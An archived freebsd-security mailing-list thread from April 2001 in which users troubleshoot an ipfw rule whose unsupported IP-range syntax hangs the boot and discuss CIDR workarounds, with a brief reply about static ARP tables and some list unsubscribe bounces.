application/program is it trying to execute? Or does ipfw itself hang when adding those rules? G'luck, Peter -- If this sentence were in Chinese, it would say something else. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 9: 0:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id 5183D37B423 for ; Sat, 21 Apr 2001 09:00:18 -0700 (PDT) (envelope-from lee@kechara.net) Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id SAA31977; Sat, 21 Apr 2001 18:15:00 +0100 Message-Id: <200104211715.SAA31977@mailgate.kechara.net> Date: Sat, 21 Apr 2001 17:02:59 +0100 To: Peter Pentchev Cc: freebsd-security@freebsd.org From: Lee Smallbone Subject: Re: ipfw problem Reply-To: lee@kechara.net Organization: Kechara Internet X-Mailer: Opera 5.02 build 856a X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello Peter, 21/04/2001 22:54:10, Peter Pentchev wrote: >On Sat, Apr 21, 2001 at 04:54:35PM +0100, Lee Smallbone wrote: >> Hi there, >> >> The machine stops booting on either of these two rules, and I have to boot into >> single user, remove the rules and reboot. What's wrong with them? >> >> ${fwcmd} add 300 unreach 9 all from 213.46.1.1-213.46.123.254 to ${ip} >> >> I also get the same problem on this rule (in place of the one above): >> >> ${fwcmd} add 300 deny all from 213.46.1.1-213.46.123.254 to ${ip} > >Where exactly in the boot process does it 'stop'? What application/program >is it trying to execute? Or does ipfw itself hang when adding those rules? ipfw hangs during boot in trying to add rule 300. > >G'luck, >Peter > >-- >If this sentence were in Chinese, it would say something else. > -- Lee Smallbone Kechara Internet lee@kechara.net www.kechara.net Tel: (01243) 869 969 Fax: (01243) 866 685 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 9: 8:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 830C637B422 for ; Sat, 21 Apr 2001 09:08:47 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 30581 invoked by uid 1000); 21 Apr 2001 16:07:10 -0000 Date: Sat, 21 Apr 2001 19:07:10 +0300 From: Peter Pentchev To: Lee Smallbone Cc: freebsd-security@freebsd.org Subject: Re: ipfw problem Message-ID: <20010421190709.D458@ringworld.oblivion.bg> Mail-Followup-To: Lee Smallbone , freebsd-security@freebsd.org References: <200104211715.SAA31977@mailgate.kechara.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104211715.SAA31977@mailgate.kechara.net>; from lee@kechara.net on Sat, Apr 21, 2001 at 05:02:59PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Apr 21, 2001 at 05:02:59PM +0100, Lee Smallbone wrote: > Hello Peter, > > 21/04/2001 22:54:10, Peter Pentchev wrote: > > >On Sat, Apr 21, 2001 at 04:54:35PM +0100, Lee Smallbone wrote: > >> Hi there, > >> > >> The machine stops booting on either of these two rules, and I have to boot into > >> single user, remove the rules and reboot. What's wrong with them? > >> > >> ${fwcmd} add 300 unreach 9 all from 213.46.1.1-213.46.123.254 to ${ip} > >> > >> I also get the same problem on this rule (in place of the one above): > >> > >> ${fwcmd} add 300 deny all from 213.46.1.1-213.46.123.254 to ${ip} > > > >Where exactly in the boot process does it 'stop'? What application/program > >is it trying to execute? Or does ipfw itself hang when adding those rules? > > ipfw hangs during boot in trying to add rule 300. Well, I think there's something wrong with the rule itself. Nowhere in the ipfw manpage could I find a syntax for specifying addresses in an address-address format - it's either a single address, or address/bits, or address:mask. Though the fact that ipfw hangs is a little disturbing, I would advise that you rewrite this rule to use proper syntax, though that might be a little tricky - the address range you've specified does not fall under an easy mask :( Do you want to allow 213.46.0.*? If not, then try.. ${fwcmd} add 300 unreach 9 all from 213.46.0.0/18 to ${ip} ${fwcmd} add 301 unreach 9 all from 213.46.64.0/19 to ${ip} ${fwcmd} add 302 unreach 9 all from 213.46.96.0/20 to ${ip} ${fwcmd} add 303 unreach 9 all from 213.46.112.0/21 to ${ip} ${fwcmd} add 303 unreach 9 all from 213.46.120.0/22 to ${ip} (ick!) This would deny everything from 213.46.0.0 to 213.46.123.255. Yes, I know it's ugly. G'luck, Peter -- Do you think anybody has ever had *precisely this thought* before? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 9:22:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id C3D4937B422 for ; Sat, 21 Apr 2001 09:22:32 -0700 (PDT) (envelope-from lee@kechara.net) Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id SAA32038; Sat, 21 Apr 2001 18:37:15 +0100 Message-Id: <200104211737.SAA32038@mailgate.kechara.net> Date: Sat, 21 Apr 2001 18:25:13 +0100 To: Peter Pentchev Cc: freebsd-security@freebsd.org From: Lee Smallbone Subject: Re: ipfw problem Reply-To: lee@kechara.net Organization: Kechara Internet X-Mailer: Opera 5.02 build 856a X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Peter, Thanks for your workaround, although it's not quite what I'd hoped for. (why does ipfw not allow ranges?? If the author listening...) I thought I had it for one minute, where I found that ${ip} isn't defined until later on in the script. No such luck. Ah well, thanks Peter! --Lee 1/04/2001 23:07:10, Peter Pentchev wrote: >On Sat, Apr 21, 2001 at 05:02:59PM +0100, Lee Smallbone wrote: >> Hello Peter, >> >> 21/04/2001 22:54:10, Peter Pentchev wrote: >> >> >On Sat, Apr 21, 2001 at 04:54:35PM +0100, Lee Smallbone wrote: >> >> Hi there, >> >> >> >> The machine stops booting on either of these two rules, and I have to boot into >> >> single user, remove the rules and reboot. What's wrong with them? >> >> >> >> ${fwcmd} add 300 unreach 9 all from 213.46.1.1-213.46.123.254 to ${ip} >> >> >> >> I also get the same problem on this rule (in place of the one above): >> >> >> >> ${fwcmd} add 300 deny all from 213.46.1.1-213.46.123.254 to ${ip} >> > >> >Where exactly in the boot process does it 'stop'? What application/program >> >is it trying to execute? Or does ipfw itself hang when adding those rules? >> >> ipfw hangs during boot in trying to add rule 300. > >Well, I think there's something wrong with the rule itself. Nowhere in >the ipfw manpage could I find a syntax for specifying addresses in >an address-address format - it's either a single address, or address/bits, >or address:mask. Though the fact that ipfw hangs is a little disturbing, >I would advise that you rewrite this rule to use proper syntax, though >that might be a little tricky - the address range you've specified does >not fall under an easy mask :( > >Do you want to allow 213.46.0.*? If not, then try.. > >${fwcmd} add 300 unreach 9 all from 213.46.0.0/18 to ${ip} >${fwcmd} add 301 unreach 9 all from 213.46.64.0/19 to ${ip} >${fwcmd} add 302 unreach 9 all from 213.46.96.0/20 to ${ip} >${fwcmd} add 303 unreach 9 all from 213.46.112.0/21 to ${ip} >${fwcmd} add 303 unreach 9 all from 213.46.120.0/22 to ${ip} > >(ick!) > >This would deny everything from 213.46.0.0 to 213.46.123.255. Yes, I know >it's ugly. > >G'luck, >Peter > >-- >Do you think anybody has ever had *precisely this thought* before? > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Lee Smallbone Kechara Internet To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 9:25:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 59ED137B422 for ; Sat, 21 Apr 2001 09:25:49 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Sat, 21 Apr 2001 11:27:49 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from mailhost.sparknet.net ([207.67.22.123]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Sat, 21 Apr 2001 11:27:49 -0500 Received: from don-oakes.sparklist.com (dhcp-client-26.sparklist.com [207.250.191.151]) by mailhost.sparknet.net (8.10.1/8.10.1) with ESMTP id f3LGU0I04892 for ; Sat, 21 Apr 2001 11:30:00 -0500 Message-Id: <4.3.1.2.20010421112208.0262eba0@207.67.22.123> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Sat, 21 Apr 2001 11:22:11 -0500 To: fwd-newswire-request From: admin Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed # Mail sent to leave-fwd-newswire-2059532e was converted to these commands: unsubscribe fwd-newswire freebsd-security@freebsd.org confirm end # This is the text of the message that triggered the action: Return-Path: Received: from mailhost.sparknet.net ([207.67.22.123]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Sat, 21 Apr 2001 11:27:49 -0500 Received: from don-oakes.sparklist.com (dhcp-client-26.sparklist.com [207.250.191.151]) by mailhost.sparknet.net (8.10.1/8.10.1) with ESMTP id f3LGU0I04892 for ; Sat, 21 Apr 2001 11:30:00 -0500 Message-Id: <4.3.1.2.20010421112208.0262eba0@207.67.22.123> X-Sender: (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 4.3.1 Date: Sat, 21 Apr 2001 11:22:11 -0500 To: leave-fwd-newswire-2059532E@nova.sparklist.com From: admin Subject: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 9:31:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from nova.sparklist.com (nova.sparklist.com [207.250.144.28]) by hub.freebsd.org (Postfix) with SMTP id 7DC1C37B422 for ; Sat, 21 Apr 2001 09:31:11 -0700 (PDT) (envelope-from sparklist-admin@nova.sparklist.com) Message-Id: X-sparklist-type: unsubscribed From: "SparkLIST.com" Reply-To: "SparkLIST.com" To: freebsd-security@freebsd.org Subject: Re: your unsubscribe request Date: Sat, 21 Apr 2001 11:33:12 -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org As you requested, you have been unsubscribed from 'fwd-newswire'. --- Return-Path: Received: from nidnud.co.il ([213.57.64.98]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Sat, 21 Apr 2001 11:33:11 -0500 Received: from rotem (windows.loc [192.168.1.2]) by nidnud.co.il (Postfix) with SMTP id 6E98E1F2CB for ; Sat, 21 Apr 2001 19:33:39 +0300 (IDT) Message-ID: <001d01c0ca88$a9ce3380$0201a8c0@rotem> From: "Rotem" To: fwd-newswire-request Subject: Date: Sat, 21 Apr 2001 19:29:47 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_001A_01C0CA99.6D463AA0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 # Mail sent to leave-fwd-newswire-2059532e was converted to these commands: unsubscribe fwd-newswire freebsd-security@freebsd.org confirm end # This is the text of the message that triggered the action: Return-Path: Received: from nidnud.co.il ([213.57.64.98]) by nova.sparklist.com with SMTP (SparkLIST.com WIN32 version 4.1); Sat, 21 Apr 2001 11:33:11 -0500 Received: from rotem (windows.loc [192.168.1.2]) by nidnud.co.il (Postfix) with SMTP id 6E98E1F2CB for ; Sat, 21 Apr 2001 19:33:39 +0300 (IDT) Message-ID: <001d01c0ca88$a9ce3380$0201a8c0@rotem> From: "Rotem" To: Subject: Date: Sat, 21 Apr 2001 19:29:47 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_001A_01C0CA99.6D463AA0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 This is a multi-part message in MIME format. ------=_NextPart_000_001A_01C0CA99.6D463AA0 Content-Type: text/plain; charset="windows-1255" Content-Transfer-Encoding: quoted-printable ------=_NextPart_000_001A_01C0CA99.6D463AA0 Content-Type: text/html; charset="windows-1255" Content-Transfer-Encoding: quoted-printable
 
------=_NextPart_000_001A_01C0CA99.6D463AA0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 9:31:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 3394F37B424 for ; Sat, 21 Apr 2001 09:31:39 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 39969 invoked by uid 1000); 21 Apr 2001 16:30:01 -0000 Date: Sat, 21 Apr 2001 19:30:01 +0300 From: Peter Pentchev To: Lee Smallbone Cc: freebsd-security@freebsd.org Subject: Re: ipfw problem Message-ID: <20010421193001.E458@ringworld.oblivion.bg> Mail-Followup-To: Lee Smallbone , freebsd-security@freebsd.org References: <200104211737.SAA32038@mailgate.kechara.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104211737.SAA32038@mailgate.kechara.net>; from lee@kechara.net on Sat, Apr 21, 2001 at 06:25:13PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Apr 21, 2001 at 06:25:13PM +0100, Lee Smallbone wrote: > Hi Peter, > > Thanks for your workaround, although it's not quite what I'd hoped for. (why does ipfw not allow > ranges?? If the author listening...) > > I thought I had it for one minute, where I found that ${ip} isn't defined until later on > in the script. No such luck. Hmm I didn't quite parse that - are you saying that ${ip} really isn't defined until later? If so, has that solved your problem? And about the ranges - ipfw(8) is only a controlling interface to the kernel ipfw routines. It would be *much* harder for the kernel to compare every packet's address against a range than it is to compare it against a netmask - the latter only involves a bitwise AND operator. I wonder if ranges would be so hard to implement though; the fact is, they are not implemented at the moment, this would take some work, and actually, I'm not aware of any other firewalling system that implements ranges. I would be VERY much out of my bailiwick here, though, because I've not dealt with that many other firewalling systems, but still, I think ranges are somewhat unusual in firewall rules :) G'luck, Peter -- I had to translate this sentence into English because I could not read the original Sanskrit. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 9:38:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id 7897637B423 for ; Sat, 21 Apr 2001 09:38:17 -0700 (PDT) (envelope-from lee@kechara.net) Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id SAA32096; Sat, 21 Apr 2001 18:53:03 +0100 Message-Id: <200104211753.SAA32096@mailgate.kechara.net> Date: Sat, 21 Apr 2001 18:41:00 +0100 To: Peter Pentchev Cc: freebsd-security@freebsd.org From: Lee Smallbone Subject: Re: ipfw problem Reply-To: lee@kechara.net Organization: Kechara Internet X-Mailer: Opera 5.02 build 856a X-Priority: 3 (Normal) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I know that some of the 'hardware' firewall boxes (such as SonicWALL) support IP ranges, but I've yet to find a software solution. 21/04/2001 23:30:01, Peter Pentchev wrote: >On Sat, Apr 21, 2001 at 06:25:13PM +0100, Lee Smallbone wrote: >> Hi Peter, >> >> Thanks for your workaround, although it's not quite what I'd hoped for. (why does ipfw not allow >> ranges?? If the author listening...) >> >> I thought I had it for one minute, where I found that ${ip} isn't defined until later on >> in the script. No such luck. > >Hmm I didn't quite parse that - are you saying that ${ip} really isn't defined >until later? If so, has that solved your problem? No, it didn't solve the problem. :) I was saying I thought it *might* have, but it was only another error, which occured after the range was specified, thus ipfw didn't ever get to that error. >And about the ranges - ipfw(8) is only a controlling interface to the kernel >ipfw routines. It would be *much* harder for the kernel to compare every >packet's address against a range than it is to compare it against a netmask - >the latter only involves a bitwise AND operator. I wonder if ranges would >be so hard to implement though; the fact is, they are not implemented at >the moment, this would take some work, and actually, I'm not aware of any >other firewalling system that implements ranges. I would be VERY much out >of my bailiwick here, though, because I've not dealt with that many other >firewalling systems, but still, I think ranges are somewhat unusual in >firewall rules :) > >G'luck, >Peter > >-- >I had to translate this sentence into English because I could not read the original Sanskrit. > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Lee Smallbone Kechara Internet lee@kechara.net www.kechara.net Tel: (01243) 869 969 Fax: (01243) 866 685 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 12:16:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 4DBCA37B422 for ; Sat, 21 Apr 2001 12:16:13 -0700 (PDT) (envelope-from Gerhard.Sittig@gmx.net) Received: (qmail 27793 invoked by uid 0); 21 Apr 2001 19:16:11 -0000 Received: from pd9508867.dip.t-dialin.net (HELO speedy.gsinet) (217.80.136.103) by mail.gmx.net (mp005-rz3) with SMTP; 21 Apr 2001 19:16:11 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id UAA18331 for freebsd-security@freebsd.org; Sat, 21 Apr 2001 20:02:09 +0200 Date: Sat, 21 Apr 2001 20:02:08 +0200 From: Gerhard Sittig To: freebsd-security@freebsd.org Subject: Re: static arp values Message-ID: <20010421200208.X20830@speedy.gsinet> Mail-Followup-To: freebsd-security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Mailer: Mutt 1.0i In-Reply-To: ; from t98pth@student.bth.se on Fri, Apr 20, 2001 at 07:13:14PM +0200 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Apr 20, 2001 at 19:13 +0200, P=E4r Thoren wrote: >=20 > Is it possible to make a arptable entry static? For example the > arp adress of my gateway. So that man-in-the-middle attack can > be prevented. See PR conf/23063 with the "[PATCH] for static ARP tables in rc.network" synopsis. It allows you to do everything statically or just "seed" your table on bootup and still have the kernel learn new entries. There's been a short thread in the -security list around the time of the PR's submission discussing that this is not a very clean and reliable method of preventing attacks but mostly gives "warm fuzzies" for those of us who like static configuration. :) virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net --=20 If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 21 22: 1:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id C91DC37B648 for ; Sat, 21 Apr 2001 22:01:08 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 (early.morning.ru [195.161.98.238]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id NAA45393 for ; Sun, 22 Apr 2001 13:03:38 +0800 (KRAST) (envelope-from poige@morning.ru) Date: Sun, 22 Apr 2001 13:04:14 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091 Reply-To: Igor Podlesny Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <68144568768.20010422130414@morning.ru> To: freebsd-security@FreeBSD.ORG Subject: Re[2]: ipfw problem X-Sender: Igor Podlesny MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org PP> On Sat, Apr 21, 2001 at 06:25:13PM +0100, Lee Smallbone wrote: >> Hi Peter, >> >> Thanks for your workaround, although it's not quite what I'd hoped for. (why does ipfw not allow >> ranges?? If the author listening...) >> >> I thought I had it for one minute, where I found that ${ip} isn't defined until later on >> in the script. No such luck. PP> Hmm I didn't quite parse that - are you saying that ${ip} really isn't defined PP> until later? If so, has that solved your problem? PP> And about the ranges - ipfw(8) is only a controlling interface to the kernel PP> ipfw routines. sure PP> It would be *much* harder for the kernel to compare every PP> packet's address against a range than it is to compare it against a netmask - PP> the latter only involves a bitwise AND operator. I rather dont agree with that statement, but consider, we should decide what *MUCH* is at any case :) And pay your attention, plz -- it does check port ranges absolutely easy.. I don't see any big difference between ports and IP-addresses. They both are represented as usual (not too big) numbers at last. PP> I wonder if ranges would PP> be so hard to implement though; the fact is, they are not implemented at PP> the moment, this would take some work, and actually, I'm not aware of any PP> other firewalling system that implements ranges. I would be VERY much out PP> of my bailiwick here, though, because I've not dealt with that many other PP> firewalling systems, but still, I think ranges are somewhat unusual in PP> firewall rules :) PP> G'luck, PP> Peter -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message